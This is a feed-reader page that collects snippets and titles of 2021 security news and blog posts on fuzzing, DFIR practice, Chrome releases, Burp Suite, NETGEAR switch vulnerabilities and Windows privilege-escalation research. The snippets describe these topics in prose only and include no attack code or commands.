    SiliFuzz: Fuzzing CPUs by Proxy [pdf]
    Article URL: https://github.com/google/fuzzing/blob/master/docs/silifuzz.pdf Comments URL: https://news.ycombinator.com/item?id=28916409 Points: 1 # Comments: 0  ( 1 min )
    Autofuzz – Java fuzzing without writing fuzz targets
    Article URL: https://blog.code-intelligence.com/autofuzz Comments URL: https://news.ycombinator.com/item?id=28915778 Points: 3 # Comments: 1  ( 2 min )
  • Open

    It Should Be ‘Cybersecurity Culture Month’
    It’s Cybersecurity Awareness Month, but security awareness is about much more than just dedicating a month to a few activities. Security awareness is a journey, requiring motivation along the way. And culture. Especially culture. That’s the point Proofpoint Cybersecurity Evangelist Brian Reed drove home in a recent appearance on Business Security Weekly. “If your security awareness program […] The post It Should Be ‘Cybersecurity Culture Month’ appeared first on Security Weekly.  ( 2 min )

  • Open

    SiliFuzz: Fuzzing CPUs by Proxy [pdf]
    Article URL: https://raw.githubusercontent.com/google/fuzzing/master/docs/silifuzz.pdf Comments URL: https://news.ycombinator.com/item?id=28909004 Points: 11 # Comments: 0  ( 41 min )
  • Open

    Resource Based Constrained Delegation
    Microsoft, in an attempt to provide more flexibility to domain users, enabled owners of resources to configure which accounts are trusted and allowed to delegate… Continue reading → Resource Based Constrained Delegation  ( 8 min )

  • Open

    Extending Chrome App Support on Chrome OS
    Posted by Paul Rossman, Technical Program Manager, Chrome Today we're announcing an important update to the previously communicated Chrome app support timeline. Based on feedback from our Enterprise and Education customers and partners, we have made the decision to extend Chrome app support for those users on Chrome OS until at least January 2025.  We continue to invest and have made significant progress in rich new capabilities on the Web platform with Progressive Web Apps (PWA), and we recommend that Chrome app developers migrate to PWAs as soon as possible. PWAs are built and enhanced with modern APIs to deliver enhanced capabilities, reliability, and installability while reaching anyone, anywhere, on any device with a single codebase. There is a growing ecosystem of powerful desktop web apps & PWAs, from advanced graphics products like Adobe Spark to engaging media apps like YouTube TV to productivity and collaboration apps like Zoom. For additional support with Chrome app migration, please visit our Web apps on Chrome OS page. This page will be kept up to date as we progress together through this process. We thank our community of developers who have provided feedback to help us shape this modified and simplified approach. We are inspired by a future beyond Chrome apps, where the ecosystem continues forward progress leveraging open Web standards across all modern browsers.

  • Open

    The Power of Developer-First Security
    Developers want to write good code. Secure code. Tools that optimize developer workflows for handling security issues can take a large burden off security practitioners and make triaging, understanding, prioritizing, and resolving vulnerabilities much easier and faster for the developer. That’s what DevSecOps is all about. One company that has developed such tools is GitLab. […] The post The Power of Developer-First Security appeared first on Security Weekly.  ( 2 min )

  • Open

    Data Exfiltration, Revisited
    I've posted on the topic of data exfiltration before (here, etc.) but often it's a good idea to revisit the topic. After all, it was almost two years ago that we saw the first instance of ransomware threat actors stating publicly that they'd exfiltrated data from systems, using this as a secondary means of extortion. Since then, we've continued to see this tactic used, along with other tertiary means of extortion based on data exfiltration. We've also seen several instances where the threat actor ransom notes have stated that data was exfiltrated but the public "shaming" sites were noticeably empty. As long as I've been involved in what was first referred to as "information security" (later referred to as "cyber security"), data exfiltration has been a concern to one degree or another, even i…  ( 5 min )

  • Open

    Show HN: Prebuilt gotip releases for quickly trying out Go 1.18 fuzzing/generics
    Article URL: https://github.com/clean8s/gotip-built Comments URL: https://news.ycombinator.com/item?id=28810470 Points: 4 # Comments: 0  ( 2 min )

  • Open

    Tips for DFIR Analysts, pt III
    Learn to think critically. Don't take what someone says as gospel, just because they say it. Support findings with data, and clearly communicate the value or significance of something. Be sure to validate your findings, and never rest your findings on a single artifact. Find an entry for a file in the AmCache? Great. But does that mean it was executed on the system? No, it does not...you need to validate execution with other artifacts in the constellation (EDR telemetry, host-based effects such as an application prefetch file, Registry modifications, etc.). Have a thorough process, one that you can add to and extend. Why? Because things are always changing, and there's always something new. If you can automate your process, then so much the better...you're not losing time and enabling…  ( 7 min )
    EDR Bypasses
    During my time in the industry, I've been blessed to have opportunities to engage with a number of different EDR tools/frameworks at different levels. Mike Tanji offered me a look at Carbon Black before carbonblack.com existed, while it still used an on-prem database. I spent a very good deal of time working directly with Secureworks Red Cloak, and I've seen CrowdStrike Falcon and Digital Guardian's framework up close. I've seen the birth and growth of Sysmon, as well as MS's "internal" Process Tracking (which requires an additional Registry modification to record full command lines). I've also seen Nuix Adaptive Security up close (including seeing it used specifically for threat hunting), which rounds out my exposure. So, I haven't seen all tools by any stretch of the imagination, but mor…  ( 6 min )

  • Open

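    [Translation] For Engineers: Everything About Certificates and Public Key Infrastructure (PKI) (SmallStep, 2018)
    Translator's preface This article is translated from a 2018 English blog post: Everything you should know about certificates and PKI but are too afraid to ask, by MIKE MALONE. Rather than introducing concepts such as PKI, X.509 and OID in a dry, piecemeal way, this long article ties them together through cause and effect and historical development. The logic is very clear, so the reader learns not only what these things are but also why they are that way. The goal of certificates and PKI is actually simple: bind names to public keys.
    Evolution of cryptographic methods:
    MAC: the earliest way to verify whether a message has been tampered with; a verification code is attached when sending the message. Both parties share the same secret and hash with it; the most commonly used hash algorithm: HMAC.
      \/
    Signature: solves some of the problems of MAC; the two parties no longer share the same secret but use a key pair.
      \/
    PKC: public-key cryptography, also called asymmetric cryptography, the most commonly used kind of signature scheme. The public key is given to others and the private key is kept to yourself; for messages sent to me, others encrypt with *my public key* and I decrypt with my private key.
      \/
    Certificate: the foundation of public-key cryptography; concepts: CA/issuer/subject/relying-party/... By function, there are two kinds:
      |--- certificates used for *signing* (issuing other certificates)
      |--- certificates used for *encryption/decryption*
    Certificate-related formats and their relationships (a heavy historical burden): the most commonly used format | a format carrying richer information than X.509 | other formats; commonly used for mTLS, etc.; Java commonly…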

  • Open

    RenderingNG: an architecture that makes and keeps Chrome fast for the long term
    Our continual investments in the performance of Chrome have led to significant improvements in battery life, memory, and the speed of the web. This post in The Fast & the Curious series highlights the rendering journey of Chrome over the past eight years, a journey that has led to a browser that is better across the board. For example, Chrome 94, as compared with Chrome 93: is up to 8% more responsive on real pages, saves more than 1400 years of CPU time per day, and improves battery life by up to 0.5% In addition, recent versions of Chrome are much better than those of years past with: 150% or more faster graphics rendering, and greater reliability, due to a 6x reduction in GPU driver crashes on problematic hardware Introduction RenderingNG is a long-term project to systematically imp…

  • Open

    Fuzzing with Postman
    For the ones who have never heard about fuzzing, here goes the short explanation: Continue reading on Medium »  ( 4 min )

  • Open

    JavaScript Test Case Generator Based on Branch Coverage and Fuzzing
    Article URL: https://slashdot.org/submission/14707493/javascript-test-case-generator-based-on-branch-coverage-and-fuzzing Comments URL: https://news.ycombinator.com/item?id=28745108 Points: 1 # Comments: 1  ( 3 min )

  • Open

    /r/netsec's Q4 2021 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your company's website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]  ( 26 min )

  • Open

    Google's Beginner Quest 2021 - all tasks solved recording
    Google CTF nowadays is a pretty large event - or should I say 3 connected events, with the pretty hardcore main CTF being one of them, and Hackceler8 - where speedrunning meets CTFs and game hacking - being the second. The last one, but probably the most popular one, is Beginners Quest - a set of CTF challenges tied together with a story (a 001337 spy story in this specific case) and aimed at folks who like challenges, but prefer to take it easy in a stress-free (i.e. no scoreboard) environment. Anyway, yesterday I've made an over 4 hour long livestream where I've solved all the challenges from this year's BQ, and here's the recording - enjoy!
    Timeline (in order of solving):
    15:46 - Task 1: CCTV (rev)
    23:38 - Task 2: Logic Lock (misc)
    34:27 - Task 3: High Speed Chase (misc)
    49:25 - Task 5: Twisted robot (misc)
    1:07:50 - Task 8: Hide and seek (misc)
    1:22:10 - Task 10: Spycam (hw)
    1:47:15 - Task 12: Old lock (web)
    1:55:47 - Task 13: Noise on the wire (net)
    2:04:45 - Task 15: Just another keypad (rev)
    2:14:48 - Task 17: Playing golf (misc)
    3:01:08 - Task 18: Strange Virtual Machine (rev)
    3:41:49 - Task 4: Electronics Research Lab (hw)
    3:51:41 - Task 6: To the moon (misc)
    4:16:40 - Task 7: ReadySetAction (crypto)
    4:25:30 - Task 9: Konski-Hiakawa Law of Droids (rev)
    4:28:23 - Task 11: pwn-notebook (pwn)
    4:41:59 - Task 14: web-quotedb (web)
    4:45:04 - Task 16: Hash-meee (misc)

  • Open

    Helping users explore the web and continue prior tasks
    When you’re looking for a certain piece of information or working on a project, your path through the internet likely isn’t a linear one. You might search for the same thing multiple times, jump between pages, head back to Google Search again, or parse through your history for that one page you can’t seem to find again. It can be challenging, and more importantly, it can take up time that you could be using to get things done. Now, we’re kicking off two new experiments with the goal of making it easier to navigate, explore and keep track of the things you find on the web. Continue your explorations of the web If you’ve already started exploring a topic and visited multiple sites along the way over a number of days or weeks, chances are you’ve found helpful information you might want to …

  • Open

    Burp Suite Professional: feature roundup
    The modern web is an increasingly complex beast. Each passing year brings with it new frameworks, technologies, and design trends - not to mention vulnerabilities. All of this adds to your testing wor  ( 6 min )

  • Open

    Training XSS Muscles
    XSS is all about practice. It requires a lot of time to print in the mind all vectors, payloads and tricks at our disposal. There are lots of XSS cases, each one requiring a different approach and construct to pop the alert box. Thinking on that and following the previous XSS Test Page released with … Continue reading Training XSS Muscles The post Training XSS Muscles appeared first on Brute XSS.
  • Open

    FUZZING: Automating Bug Detection
    Sometimes hacking isn’t about taking a program apart: It’s about throwing random objects at it to see what breaks. Continue reading on OWASP VITCC »  ( 4 min )

  • Open

    Imposter Syndrome
    Imposter Syndrome.  This is something many of us have experienced to one degree or another, at various times. Many have experienced it, some have overcome it, others may not be able to and wonder why. HealthLine tells us, "Imposter feelings represent a conflict between your own self-perception and the way others perceive you." I would modify that slightly to, "...the way we believe others perceive us." Imposter syndrome is something internalized, and has very little to do with the outside world. I wanted to take the opportunity to share with you, the reader, what I've learned over the years about what's really happening in the world when we're having those feelings of imposter syndrome. Perception: I don't want to present at a conference, or ask a question at a conference, because everyone know…  ( 6 min )

  • Open

    Chrome 95 Beta: Secure Payment Confirmation, WebAssembly Exception Handling and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 95 is beta as of September 23, 2021. Origin Trials This version of Chrome introduces the origin trials described below. Origin trials allow you to try new features and give feedback on usability, practicality, and effectiveness to the web standards community. To register for any of the origin trials currently supported in Chrome, including the ones described below, visit the Chrome Origin Trials dashboard. To learn more about origin trials in Chrome, visit the Origin Trials Guide for Web Developers. Microsoft Edge runs its own origi…

  • Open

    Dev.fuzz (fuzzing) merged in Golang tip
    Article URL: https://github.com/golang/go/commit/6e81f78c0f1653ea140e6c8d008700ddad1fa0a5 Comments URL: https://news.ycombinator.com/item?id=28604475 Points: 2 # Comments: 0  ( 7 min )
    Native fuzzing will be in Go 1.18
    Article URL: https://twitter.com/katie_hockman/status/1440082486692773897 Comments URL: https://news.ycombinator.com/item?id=28602233 Points: 1 # Comments: 0  ( 1 min )

  • Open

    Building a More Secure AppDev Process
    Enterprises that integrate security testing into their CI/CD pipeline fix 91.4 percent of new issues, according to a progress report from ShiftLeft. Recent software supply chain attacks illustrate the growing risks businesses, their partners, and customers face. But a recent report suggests better outcomes for those who put security at the heart of app development. Data from […] The post Building a More Secure AppDev Process appeared first on Security Weekly.  ( 2 min )
  • Open

    Software Fuzzing: What, Why, What next?
    Software development is a manual process and, more often than not, is the work of one or more developers with varied expertise and… Continue reading on Medium »  ( 5 min )

  • Open

    Distros and RegRipper
    Over the years, every now and then I've taken a look around to try to see where RegRipper is used. I noticed early on that it's included in several security-oriented Linux distros. So, I took the opportunity to compile some of the links I'd found, and I then extended those a bit with some Googling. I will admit, I was a little surprised to see how, over time, how far RegRipper has gone, from a "here, look at this" perspective. Not all of the below links are current, some are several years old. As such, they are not the latest and greatest; however, they may still apply and they may still be useful/valuable. RegRipper on Linux (Distros)  Kali, Kali GitLab  SANS SIFT  CAINE   Installing RegRipper on Linux  Install RRv2.8 on Ubuntu  CentOS RegRipper package  Arch Linux   RegRipper Docker Imag…  ( 5 min )
    On Writing DFIR Books, pt II
    Part I of this series kicked things off for us, and honestly I have no idea how long this series will be...I'm just writing the posts without a specific plan or outline for the series. In this case, I opted to take an organic approach, and wanted to see where it would go. Content Okay, so you have an idea for a book, but about...what? You may have a title or general idea, but what's the actual content you intend to write about? Is it more than a couple of paragraphs; can you actually create several solid chapters without having to use a lot of filler and fluff? Back when I was actively writing books, this was something on the forefront of my mind, not only because I was writing books, but later I got a question or two from others along these lines. In short, I write about stuff I know, or …  ( 5 min )

  • Open

    PetitPotam – NTLM Relay to AD CS
    Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different… Continue reading → PetitPotam – NTLM Relay to AD CS  ( 6 min )
  • Open

    User-Agent Reduction Origin Trial and Dates
    Back in May, we published an update on our User-Agent string reduction plans with a promise to publish further details on timing. Now that we have an origin trial ready for testing the Reduced User-Agent header (and associated JS interfaces) we have estimated timelines to share. What follows is repeated from the original blog post, but contains estimated Chrome versions where these Phases will begin to help you prepare.  The Chromium schedule dashboard will be useful for understanding dates associated with each Chrome version and its progression from Canary into Beta and Stable Release. Note: The usual disclaimers about estimating engineering deadlines apply—unforeseen circumstances may dictate delays. But in the case that we encounter delays, we do not intend to accelerate timelines bet…
  • Open

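    [Translation] Role-Based Access Control (RBAC): Evolution, Design Philosophy, and a Simple Implementation (Tailscale, 2021)
    Translator's preface: This article is translated from a 2021 English blog post: RBAC like it was meant to be. Many systems (for example Kubernetes and AWS) use some form of RBAC for permission/access control. Drawing on the history of access control, this article analyzes at the design level the evolution DAC -> MAC -> RBAC -> ABAC, along with each model's strengths, weaknesses, and applicable scenarios, and then, starting from practical requirements, designs step by step a practical, simple access control system that truly follows the RBAC philosophy. For comparison, if you want to see what a more expressive (but also more complex) RBAC/ABAC system looks like, you can study the AWS access control model. Because the translator's ability is limited, this article inevitably contains omissions or errors. If in doubt, please consult the original. The translation follows. Translator's preface 1 From DAC to MAC 1.1 DAC (discretionary access control): each file owner sets file permissions at their own discretion Design Use case: file permission control for ordinary users 1.2 MAC (mandatory access control): a dedicated admin (mandatorily) sets file permissions Design: a dedicated admin role introduced on top of DAC Example: TCP/UDP port numbers Applicable scenarios: document/system access control 1.3 Two-factor login as MAC 1.4 Image sharing: comparing the DAC/MAC models 1.5 The MAC concept: too many restrictions, yet seemingly hardly any 2 First attempt: based on RBAC/ABAC 2.1 RBAC (role-based access control) 2.2 ABAC (attribute-based access control) 2.3 Perhaps you have never used real RBAC The Windows file security model: one ACL per file controls who can access which file 2.4 The problem: too many ACLs, duplicated everywhere, hard to change in bulk 3 Second attempt: one user group per ACL 3.1 Still…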

  • Open

    Account Persistence – Certificates
    It is not uncommon for organizations to implement an internal certification authority in order to establish trust between entities (users, computers etc.) or utilize it for… Continue reading → Account Persistence – Certificates  ( 7 min )
  • Open

    Seventh Inferno vulnerability (some NETGEAR smart switches)
    TL;DR: NETGEAR just patched 3 reported vulnerabilities (Demon's Cries, Draconian Fear and Seventh Inferno) in some managed (smart) switches. If you or your company owns any of these devices, please patch now. P.S. This vulnerability and exploit chain is actually quite interesting technically. In short, it goes from a newline injection in the password field, through being able to write a file with constant uncontrolled content of 2 (like, one byte 32h), through a DoS and session crafting (which yields an admin web UI user), to an eventual post-auth shell injection (which yields full root). …

  • Open

    Tips for DFIR Analysts, pt II
    On the heels of my first post with this subject, I thought I'd continue adding tips as they came to mind... I've been engaged with EDR frameworks for some time now. I first became aware of Carbon Black before it was "version 1.0", and before "carbonblack.com" existed. Since then, I've worked for several organizations that developed EDR frameworks (Secureworks, Nuix, CrowdStrike, Digital Guardian), and others that made use of frameworks created by others. I've also been very happy to see the development and growth of Sysmon, and used it in my own testing. One thing I've been acutely aware of is the visibility afforded by EDR frameworks, as well as the extent of that visibility. This is not a knock against these tools...not at all. EDR frameworks and tools are incredibly powerful, but they a…  ( 5 min )
    On Writing DFIR Books, pt I
    During my time in the industry, I've authored 9 books under three imprints, and co-authored a tenth. There, I said it. The first step in addressing a problem is admitting you have one. ;-) Seriously, though, this is simply to say that I have some experience, nothing more. During the latter part of my book writing experience, I saw others who wanted to do the same thing, but ran into a variety of roadblocks, roadblocks I'd long since navigated. As a result, I tried to work with the publisher to create a non-paid liaison role that would help new authors overcome many of those issues, so that a greater portfolio of quality books became available to the industry. By the time I convinced one editor of the viability and benefit of such a program, they had decided to leave their profession, and I…  ( 7 min )
  • Open

    Draconian Fear vulnerability (some NETGEAR smart switches)
    TL;DR: NETGEAR just patched 3 reported vulnerabilities (Demon's Cries, Draconian Fear and Seventh Inferno) in some managed (smart) switches. If you or your company owns any of these devices, please patch now. Note: Details on Seventh Inferno will be published on or after 13th September. Affected devices: GC108P GC108PP GS108Tv3 GS110TPP GS110TPv3 GS110TUP GS308T GS310TP GS710TUP GS716TP GS716TPP GS724TPP GS724TPv2 GS728TPPv2 GS728TPv2 GS750E GS752TPP GS752TPv2 MS510TXM MS510TXUP …
    Demon's Cries vulnerability (some NETGEAR smart switches)
    TL;DR: NETGEAR just patched 3 reported vulnerabilities (Demon's Cries, Draconian Fear and Seventh Inferno) in some managed (smart) switches. If you or your company owns any of these devices, please patch now. Note: Details on Seventh Inferno will be published on or after 13th September. Affected devices: GC108P GC108PP GS108Tv3 GS110TPP GS110TPv3 GS110TUP GS308T GS310TP GS710TUP GS716TP GS716TPP GS724TPP GS724TPv2 GS728TPPv2 GS728TPv2 GS750E GS752TPP GS752TPv2 MS510TXM MS510…

  • Open

    Kiterunner API Fuzzer (Windows Installation)
    Hello Friends, This post is to tell you about an API scanner called Kiterunner, I heard about it through Ms. Alissa Knight’s white paper “Go… Continue reading on Medium »

  • Open

    OSInt, Doxing And Cyberstalking Page Updated
    Link: http://www.irongeek.com/i.php?page=security/doxing-footprinting-cyberstalking I added (https://usersearch.org) to the site. I also moved dead links to the bottom of the page. If you know sites/tools I should add, please contact me. The site has gotten a bit dated I think.

  • Open

    Web App and API Security Needs to Be Modernized: Here’s How
    Applications are critical for doing business. They are also the weakest links in many an organization’s security chain. Many APIs continue to expose the personally identifiable information of customers, employees and contractors. As OWASP (Open Web Application Security Project) notes on its API Security Project homepage: “By nature, APIs expose application logic and sensitive data […] The post Web App and API Security Needs to Be Modernized: Here’s How appeared first on Security Weekly.  ( 2 min )

  • Open

    Building a Career in CyberSecurity
    There's been a lot of discussion on social media around how to "break into" the cybersecurity field, not only for folks just starting out but also for those looking for a career change. This is not unusual, given what we've seen in the public news media around cyber attacks and ransomware; the idea is that cybersecurity is an exploding career field that is completely "green fields", with an incredible amount of opportunity. Jax Scott recently shared a YouTube video (be sure to comment and subscribe!) where she provides five steps to level up any career, based on her "must read for anyone seeking a career in cybersecurity" blog post. Jax makes a lot of great points, and rather than running through each one and giving my perspective, I thought I'd elaborate a bit on one in particular. Jax's …  ( 4 min )

  • Open

    Chrome 94 Beta: WebCodecs, WebGPU, Scheduling, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 94 is beta as of August 26, 2021. WebCodecs Existing media APIs (HTMLMediaElement, Media Source Extensions, WebAudio, MediaRecorder, and WebRTC) are high-level and narrowly-focused. A low-level codec API would better support emerging applications, such as latency-sensitive game streaming, client-side effects or transcoding, and polyfillable media container support, without the increased network and CPU cost of JavaScript or WebAssembly codec implementations. The WebCodecs API eliminates these deficiencies by giving programmers a w…
  • Open

    Tips for DFIR Analysts
    Over the years as a DFIR analyst...first doing digital forensics analysis, and then incorporating that analysis as a component of IR activity...there have been some stunningly simple truths that I've learned, truths that I thought I'd share. Many of these "tips" are truisms that I've seen time and time again, and recognized that they made much more sense and had more value when they were "named". Tips, Thought, and Stuff to Think About Computer systems are a finite, deterministic space. The adversary can only go so far, within memory or on the hard drive. When monitoring computer systems and writing detections, the goal is not to write the perfect detection, but rather to force the adversary into a corner, so that no matter what they do, they will trigger something. So, it's a good thing to…  ( 9 min )
  • Open

    Burp extensions added to Burp Suite Enterprise Edition
    Burp Extensions (and your own custom extensions) will now be supported by Burp Suite Enterprise Edition, brand new for the 2021.8 release. If you've had much experience with Burp Suite Professional, i  ( 5 min )

  • Open

    It's now easier than ever to scan at scale with Burp Suite Enterprise Edition
    774 organizations in 68 countries are now using Burp Suite Enterprise Edition to improve and scale security across their web portfolios. As we pass the three-year anniversary of development on Burp Su  ( 4 min )

  • Open

    A New Attack Surface on MS Exchange Part 3 - ProxyShell!
    No content preview

  • Open

    The history of OAST in Burp Suite
    At PortSwigger, we pride ourselves on pushing the boundaries of web security. Just take a peek at some of our researchers' recent and upcoming talks from the likes of Black Hat and DEF CON if you'd li  ( 4 min )
  • Open

    Domain Escalation – PrintNightmare
    Printers are part of every corporate infrastructure, therefore Windows environments have a number of embedded drivers installed. The Print Spooler (spoolsv.exe) service is responsible… Continue reading → Domain Escalation – PrintNightmare  ( 5 min )

  • Open

    HiveNightmare
    The security account manager (SAM) file contains the password hashes of the users on a Windows system. Since it is considered a sensitive file SYSTEM… Continue reading → HiveNightmare  ( 6 min )

  • Open

    PHDays 10 IDS Bypass contest: writeup and solutions
    For the second time, the IDS Bypass contest was held at the Positive Hack Days conference. Just like last time (see blog.ptsecurity.com/2019/07/ids-bypass-contest-at-phdays-writeup.html), the players were supposed not only to find flaws in the six services and capture the flags, but also bypass the IDS, which would interfere with them. Alert messages about the facts of triggering IDS rules were supposed to help in bypassing them. And as you know from the last competition, there can be infinitely many solutions to tasks. Here we go. 192.168.30.10—Apache Tomcat On port 8080, we can see Apache Tomcat version 9.0.17. The first search for an exploit for this version should lead to CVE-2019-0232. This task was intended as an introductory one and was supposed to be the simplest (although som…
  • Open

    “En-pass” — TryHackme Walkthrough (Medium Level CTF)
    In this room we are asked to find the path hidden inside the website. With the information we get from the paths we find, solving the machine… Continue reading on Medium »  ( 5 min )

  • Open

    A New Attack Surface on MS Exchange Part 1 - ProxyLogon!
    No content preview
    A New Attack Surface on MS Exchange Part 2 - ProxyOracle!
    No content preview

  • Open

    How The Best Defense Gets Better: Part 2
    For many enterprises, incident response is an exercise in chaos. Security teams scramble to figure out how a data breach happened and crash into brick walls as they try to collect information from different departments that are often siloed from everyone else. It doesn’t have to be that way. Advanced security teams have learned that […] The post How The Best Defense Gets Better: Part 2 appeared first on Security Weekly.  ( 2 min )

  • Open

    Posting limits have been enabled on r/opendirectories.
    I'm not going to name any names, but because of many complaints of too many threads being created in a short time period by one user, we have set a limit of 2 5 posts per hour for any one user. This is not for comments, just new posts. Let us know if the limit is set too high or too low and we can adjust it if enough people agree. thanks, Your Loving Mods. edit: after reading the comments, the posting rate has been adjusted to 5 posts per user per hour. submitted by /u/MrDorkESQ [link] [comments]  ( 4 min )

  • Open

    APT31 new dropper. Target destinations: Mongolia, Russia, the U.S., and elsewhere
    Our pros at the PT Expert Security Center regularly spot emerging threats to information security and track the activity of hacker groups. During such monitoring in April 2021, a mailing list with previously unknown malicious content was sent to Mongolia. Similar attacks were subsequently identified in Russia, Belarus, Canada, and the United States. According to PT ESC threat intelligence analysts, from January to July 2021, approximately 10 attacks were carried out using the discovered malware samples. Some of the files found during the study had rather interesting names ("хавсралт.scr" ["havsralt.scr"] (mong. attachment), "Информация_Рб_июнь_2021_года_2021062826109.exe") and, as the study showed, they contained a remote access trojan (RAT). A detailed analysis of malware samples, data on…

  • Open

    HYBRID HACKER SUMMER CAMP 2021 GUIDE — Part Five: FuzzCON
    Welcome to the DEFCON 201 guide to Hybrid Hacker Summer Camp! This is part of a series where we are going to cover all the various hacker… Continue reading on Medium »  ( 8 min )
  • Open

    Universal Privilege Escalation and Persistence – Printer
    The Print Spooler is responsible for managing and processing printer jobs. It runs as a service with SYSTEM level privileges on Windows environments. Abuse of… Continue reading → Universal Privilege Escalation and Persistence – Printer  ( 5 min )

  • Open

    Chrome 93: Multi-Screen Window Placement, PWAs as URL Handlers, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Android WebView, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 93 is beta as of July 29, 2021. Origin Trials This version of Chrome introduces the origin trials described below. Origin trials allow you to try new features and give feedback on usability, practicality, and effectiveness to the web standards community. To register for any of the origin trials currently supported in Chrome, including the ones described below, visit the Chrome Origin Trials dashboard. To learn more about origin trials in Chrome, visit the Origin Trials Guide for Web Developers. Microsoft Edge runs i…

  • Open

    Introducing the Burp Suite Certified Practitioner accreditation
    We launched the Web Security Academy in April 2019, as a means of providing free training and learning materials for security professionals. We now have 200 labs, and last year the Web Security Academ  ( 4 min )

  • Open

    Diversifying Cybersecurity Talent Through Aptitude Testing
    With a shortage of four million cybersecurity workers, we need to get more creative in identifying non-technical skills among potential candidates that can be applied to the cybersecurity realm. One way is to test them for aptitude and personality traits, like the career planning tests I took in college.That’s what the University of Maryland did […] The post Diversifying Cybersecurity Talent Through Aptitude Testing appeared first on Security Weekly.  ( 2 min )
  • Open

    Faster and more efficient phishing detection in M92
    Keeping Chrome users safe as they browse the web is crucially important to Chrome; in fact, security has always been one of our four core principles. In some cases, security can come at the expense of performance. In our next post in The Fast and the Curious series, we are excited to share how improvements to our phishing detection algorithms keep users safe online. With these improvements, phishing detection is now 50 times faster and drains less battery. Phishing detection Every time you navigate to a new page, Chrome evaluates a collection of signals about the page to see if it matches those of phishing sites. To do that, we compare the color profile of the visited page - that’s the range and frequency of the colors present on the page - with the color profiles of common pages. For e…

  • Open

    How to detect a cyberattack and prevent money theft
    Money theft is one of the most important risks for any organization, regardless of its scope of activity. According to our data, 42% of cyberattacks on companies are committed to obtain direct financial benefits. You can detect an attack at various stages — from network penetration to the moment when attackers start withdrawing money. In this article, we will show how to detect an attack at each of its stages and minimize the risk, as well as analyze two common scenarios of such attacks: money theft manually using remote control programs and using special malware — a banking trojan. Where to look for signs of the attack Penetration into the company's network Phishing emails Most often, attackers get into the local network by sending phishing emails with malicious attachme…

  • Open

    Making numbers out of thin air, Python bytecode edition

  • Open

    Increasing HTTPS adoption
    When a browser connects to websites over HTTPS (vs. HTTP), eavesdroppers and attackers on the network can't intercept or alter the data that's shared over that connection (including personal info, or even the page itself). This level of privacy and security is vital for the web ecosystem, so Chrome continues to invest in making HTTPS more widely supported. Thankfully, HTTPS adoption has come a long way in recent years, and most operating systems now see 90%+ of page loads over HTTPS in Chrome. Still, there's more we can do to help make HTTPS the preferred protocol on the web, and better protect users on the remaining slice of the web that doesn’t yet support HTTPS, so today we're sharing some future work in this area. Opting in to an HTTPS-First World Beginning in M94, Chrome will…

  • Open

    OISF 2021 Videos
    OISF 2021 Videos These are the videos from the OISF Anniversary Event Opening Remarks OISF President Inside the Mind of a Threat Actor: Beyond Pentesting Phillip Wylie I Got 99 Problems but a WAF ain't one Micah Brown Code Hedgehogs - Changing the "S" in SDLC to Secure Penelope Rozhkova A Look at Cellular Services in IoT technology Deral Heiland Chats, Cheats, and Cracks: Abuse of Collaboration Platforms in Malware Campaigns Edmund Brumaghin Lend me your IR's! Matt Scheurer Download from: https://archive.org/details/oisf2021

  • Open

    Burp Suite roadmap update: July 2021
    Apparently we're halfway through 2021 already (where does the time go?). Here's an update on what we've added to our products so far this year, as well as some exciting new features we're adding to ou  ( 5 min )

  • Open

    ClickMeeting minor privacy weakness (fixed)
    Just a short reminder to anonymize data on the server-side and not in the browser, illustrated by a small privacy vulnerability I've found during, well, a security talk I've attended that took place on the ClickMeeting platform (it was still 10 minutes before the talk began you understand). Props to ClickMeeting for a fast reaction time and good communication - this bug is long fixed (reported on April 7th 2021). Original report (though redacted a bit) follows: Hey folks, I've joined a webinar hosted on clickmeeting platform today, and noticed one thing which I found curious. The webinar I attended had chat enabled, however there seem to be some "privacy mode" enabled for attendees - i.e. the chat didn't display the list of people (which is pretty standard…

  • Open

    Black Hat USA 2021: PortSwigger's latest research to be unveiled
    Two years ago, PortSwigger's director of research James Kettle presented "HTTP Desync Attacks" on-stage at BlackHat USA and kicked off a wave of request smuggling, but at that time HTTP/2 escaped seri  ( 4 min )

  • Open

    popen+cat explained
    A few days ago I tweeted about this "open and read a file with popen+cat" gem I found in the firmware of one of NETGEAR's devices: How to read a file in C according to NETGEAR pic.twitter.com/TRbxWC5vsY — Gynvael Coldwind (@gynvael) July 1, 2021 Since there were some questions about "why is this a bad pattern?", I decided to write a short blog post explaining this. But before we get there, please also see this short thread, or just remember to not blame an individual engineer for writing that code – rather blame the procedures NETGEAR has with regards to secure code development and quality assurance. Context? Let's start by adding some more context to this tweet – where is this code from, and is it the source code or something else? This code was found in the firm…

  • Open

    Introducing DOM Invader: DOM XSS just got a whole lot easier to find
    Of the three main types of XSS, DOM-based XSS is by far the most difficult to find and exploit. But we come bearing good news! PortSwigger just released a new tool for Burp Suite Professional and Burp  ( 7 min )
  • Open

    Preventing Criminals from Using Cloud Applications to Inject Chaos Into Work Environments
